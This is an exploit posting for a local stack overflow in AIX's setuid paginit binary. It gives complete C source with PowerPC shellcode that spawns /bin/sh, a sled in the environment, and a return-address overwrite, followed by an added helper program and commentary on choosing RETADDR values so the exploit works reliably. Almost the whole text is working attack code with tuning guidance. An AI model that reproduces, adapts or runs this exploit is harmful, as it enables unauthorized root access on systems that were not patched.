AIX 5.3/5.2/5.1 "paginit" local stack overflow Exploit
Source: vfocus.net  Author: vfocus  Published: 2004-12-21

/* exploit for /usr/bin/paginit (setuid), argument-based stack overflow
tested on: AIX 5.2

If the exploit fails, the shellcode ended up at a different address:
check with dbx and change RETADDR accordingly.

cees-bart <ceesb cs ru nl>
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Address the overwritten return slot is pointed at: somewhere inside the
 * landing zone of the environment string built below. */
#define RETADDR 0x2ff22c90

/* AIX/PowerPC execve("/bin/sh") shellcode, 56 bytes, no NUL byte before the
 * terminator of "/bin/sh" (so it survives being copied as a C string).
 * Its first word, 0x7ca52a79 (xor. r5,r5,r5), is also the filler used
 * for the landing zone: it is harmless wherever execution lands on it. */
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

/* Store x big-endian: the byte order PowerPC/AIX uses for both addresses
 * and instruction words. */
void printint(char *buf, unsigned int x) {
    buf[0] = x >> 24;
    buf[1] = (x >> 16) & 0xff;
    buf[2] = (x >> 8) & 0xff;
    buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
    char *env[2];
    char code[1000];    /* environment string: "X=" + landing zone + shellcode */
    char buf[8000];     /* argv[1] for paginit: overflows its stack buffer */
    char *p, *i;
    int offset1 = 0;

    offset1 = 0; // atoi(argv[1]);

    memset(code, 'C', sizeof(code));
    memcpy(code, envlabel, sizeof(envlabel) - 1);
    /* landing zone: 0x7ca52a79 words from offset 3 (after "X=" and one 'C')
     * up to the shellcode at offset 943 = 3 + 4*235, so the sled words run
     * straight into the shellcode. The bound keeps the last word inside
     * code[] (the original loop wrote three bytes past the end). */
    for (i = code + sizeof(envlabel) + offset1; i + 4 <= code + sizeof(code); i += 4)
        printint(i, 0x7ca52a79);

    /* shellcode at the end of the string; its "/bin/sh" NUL terminates it */
    memcpy(code + sizeof(code) - sizeof(shellcode), shellcode, sizeof(shellcode) - 1);
    code[sizeof(code) - 1] = 0;

    env[0] = code;
    env[1] = 0;

    /* overflow string: 'A's, with the two stack slots that matter patched in */
    memset(buf, 'A', sizeof(buf));
    buf[sizeof(buf) - 1] = 0;

    p = buf;
    p += 4114;
    printint(p, RETADDR); // saved return address: try to hit the landing zone
    p += 72;
    printint(p, RETADDR); // any readable address will do here (apparently not overwritten)

    /* NULL-terminate the variadic argv list properly; execle only returns on failure */
    execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
    perror("execle");
    return 1;
}
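The header comment says to read the shellcode's address in dbx and adjust RETADDR, but the layout above imposes a constraint it does not spell out: the landing-zone words sit at offset 3 + 4k of the environment string and flow into the shellcode at offset 943, and PowerPC only fetches instructions from 4-byte-aligned addresses, so a jump into the sled works only when the string's base address plus 3 is itself a multiple of four, and RETADDR must then be one of the word boundaries between there and the shellcode, with no 0x00 byte (it is copied into argv as a C string). The helper below is an added example, not part of the original exploit: it reproduces the exploit's layout constants and, given a base address read from dbx, reports whether the sled is usable, which RETADDR values reach the shellcode, and how far (mod 4) the string would have to move otherwise. The base address 0x2ff22901 in main is constructed for illustration, not a measured AIX address, and the suggestion to shift the string by changing the environment is a general technique whose direction you must confirm in dbx.

```c
#include <stdint.h>
#include <stdio.h>

/* Layout constants reproduced from the exploit above: the env string is
 * "X=" + one 'C' + a sled of 0x7ca52a79 words + the 56-byte shellcode + NUL,
 * 1000 bytes in total. */
#define CODE_LEN   1000u
#define SLED_OFF   3u                          /* first sled word, after "X=" and one 'C' */
#define SC_LEN     56u                         /* shellcode bytes, not counting C's NUL */
#define SC_OFF     (CODE_LEN - (SC_LEN + 1u))  /* 943: where the shellcode starts */

/* A return address travels inside argv as C-string bytes, so it must not
 * contain 0x00 (the kernel's copy of the argument would stop there). */
int has_nul_byte(uint32_t v) {
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return 1;
    return 0;
}

/* env_base: runtime address of the 'X' of the env string (read it in dbx).
 * Sled words sit at env_base + 3 + 4k and run into the shellcode at
 * env_base + 943, so the sled is executable only when env_base + 3 is a
 * multiple of four. */
int sled_is_word_aligned(uint32_t env_base) {
    return ((env_base + SLED_OFF) & 3u) == 0;
}

/* How far (mod 4) the string has to move for the sled to align. Whether an
 * extra environment variable shifts it up or down depends on how the kernel
 * lays out the strings: change the environment, then re-check in dbx. */
uint32_t sled_shift_needed(uint32_t env_base) {
    return (4u - ((env_base + SLED_OFF) & 3u)) & 3u;
}

/* Address of the shellcode itself (the last valid jump target). */
uint32_t shellcode_addr(uint32_t env_base) {
    return env_base + SC_OFF;
}

/* Lowest / highest RETADDR that still reaches the shellcode, or 0 if the
 * sled is unusable at this base. Addresses inside the range that contain a
 * NUL byte are still excluded by retaddr_reaches_shellcode(). */
uint32_t sled_first_target(uint32_t env_base) {
    return sled_is_word_aligned(env_base) ? env_base + SLED_OFF : 0u;
}
uint32_t sled_last_target(uint32_t env_base) {
    return sled_is_word_aligned(env_base) ? shellcode_addr(env_base) : 0u;
}

/* 1 if jumping to ret lands on a sled word boundary (or exactly on the
 * shellcode) and therefore ends up executing the shellcode; 0 otherwise,
 * with the reason in *why when a pointer is supplied. */
int retaddr_reaches_shellcode(uint32_t env_base, uint32_t ret, const char **why) {
    uint32_t lo = env_base + SLED_OFF;
    uint32_t sc = shellcode_addr(env_base);
    const char *reason = "ok";
    int ok = 1;
    if (has_nul_byte(ret))                    { reason = "RETADDR contains a NUL byte"; ok = 0; }
    else if (!sled_is_word_aligned(env_base)) { reason = "sled is not word-aligned at this base"; ok = 0; }
    else if (ret & 3u)                        { reason = "RETADDR is not 4-byte aligned"; ok = 0; }
    else if (ret < lo || ret > sc)            { reason = "RETADDR is outside the sled"; ok = 0; }
    if (why) *why = reason;
    return ok;
}

int main(void) {
    /* Constructed base address for illustration; read the real one in dbx. */
    uint32_t base = 0x2ff22901u;
    uint32_t ret  = 0x2ff22c90u;   /* the exploit's RETADDR */
    const char *why;

    if (sled_is_word_aligned(base))
        printf("valid RETADDR range: %#x .. %#x (step 4), shellcode at %#x\n",
               sled_first_target(base), sled_last_target(base), shellcode_addr(base));
    else
        printf("sled unusable at %#x: shift the string by %u bytes (mod 4)\n",
               base, sled_shift_needed(base));

    retaddr_reaches_shellcode(base, ret, &why);
    printf("RETADDR %#x: %s\n", ret, why);
    return 0;
}
```

With the constructed base, the exploit's RETADDR lands 908 bytes into the sled, on a word boundary; at a base one byte lower the same RETADDR fails not because of the offset but because every sled word is then misaligned, which is the failure mode the dbx check is meant to catch.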
